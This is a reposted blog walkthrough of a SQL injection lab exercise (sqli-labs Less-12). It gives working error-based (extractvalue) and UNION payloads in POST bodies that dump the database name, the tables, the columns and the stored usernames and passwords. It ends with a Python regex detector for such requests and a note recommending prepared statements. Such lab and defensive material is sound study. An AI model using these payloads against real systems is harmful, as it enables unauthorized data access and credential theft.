[SQL Injection] Less-12: Error-Based Double-Quote POST String Injection (Variant)

Method 1: extractvalue error-based injection

1. Dump the database name
Payload: "*" is used to close the SQL query statement; using --+ does not work here.

uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit

2. Dump the tables
Payload:

uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and " &passwd=admin&submit=Submit

3. Dump the table's columns
Payload:

uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and " &passwd=admin&submit=Submit

4. Dump the column (field) data
Payload:

uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from users))) and " &passwd=admin&submit=Submit

Method 2: UNION query injection

Dump the database name

uname=0") union select 1,database() --+ &passwd=admin&submit=Submit
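
From the defender's side, the two request shapes above (error-based via extractvalue, and UNION-based) can be flagged in POST bodies before they reach the query. The following is an added example, not code from the original post; the rule set and the function name inspect_post_body are assumptions made for illustration, and the rules are heuristics that can also match unusual but legitimate input.

```python
import re
from urllib.parse import parse_qsl

# Heuristic rules chosen for this example (assumptions, not from the post).
RULES = {
    # MySQL XPath function abused to leak data through an error message
    "error_based_xpath": re.compile(r"\bextractvalue\s*\(", re.I),
    # UNION SELECT appended to the original query
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    # Enumeration of tables/columns through the metadata schema
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    # A quote (optionally followed by ')') that closes the string and is
    # immediately followed by a boolean or UNION keyword
    "quote_breakout": re.compile(r"[\"']\s*\)?\s*(and|or|union)\b", re.I),
}


def inspect_post_body(body):
    """Return {field: [rule names]} for every form field that matches a rule."""
    findings = {}
    # parse_qsl splits on the first '=' of each pair, so '=' inside a value
    # (e.g. table_schema=database()) stays part of that value.
    for field, value in parse_qsl(body, keep_blank_values=True):
        hits = sorted(name for name, rx in RULES.items() if rx.search(value))
        if hits:
            findings[field] = hits
    return findings


# Sample bodies: "benign" is constructed; the other two are request bodies
# shown on this page.
SAMPLES = {
    "benign": "uname=admin&passwd=admin&submit=Submit",
    "error_based": 'uname=admin" and extractvalue(1,concat(0x7e,'
                   '(select database()))) and " &passwd=admin&submit=Submit',
    "union": 'uname=0") union select 1,database() --+ '
             '&passwd=admin&submit=Submit',
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, inspect_post_body(body))
```

Detection of this kind complements, and does not replace, binding uname and passwd as parameters in a prepared statement so that a double quote in the input cannot close the string.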


Reposted from blog.csdn.net/Mitchell_Donovan/article/details/115335986